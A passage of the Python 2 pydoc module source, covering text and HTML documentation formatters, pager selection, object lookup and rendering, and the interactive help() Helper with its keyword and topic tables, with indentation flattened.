push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', _binstr(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', _binstr(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', _binstr(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
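# Selection summary: getpager() uses plain output when stdout is not a real tty,
# otherwise it tries $PAGER (with special cases for win32 and dumb/emacs
# terminals), then 'more' on win32/os2, then 'less', then 'more' via a temp
# file, and finally the built-in ttypager defined below, e.g.
#   pager('\n'.join(['line %d' % i for i in range(200)]))  # pages via the chosen method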
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(_encode(text))
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(_encode(text))
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = int(os.environ.get('LINES', 25)) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding)))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
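# Usage sketch: locate() walks a dotted path, importing along the way, e.g.
#   locate('json.dumps')      # imports json and returns the dumps function
#   locate('no.such.thing')   # returns None instead of raising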
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
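# Usage sketch: render_doc() returns the same text that doc()/help() would
# page, without invoking the pager, e.g.
#   page = render_doc('os.path')
#   page.startswith('Python Library Documentation')   # -> True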
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
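# Usage sketch: this module-level Helper instance backs the interactive help,
# e.g. help('modules json') lists modules whose synopses mention 'json', and
# help('LOOPING') pages that language topic (requires pydoc_data.topics).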
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
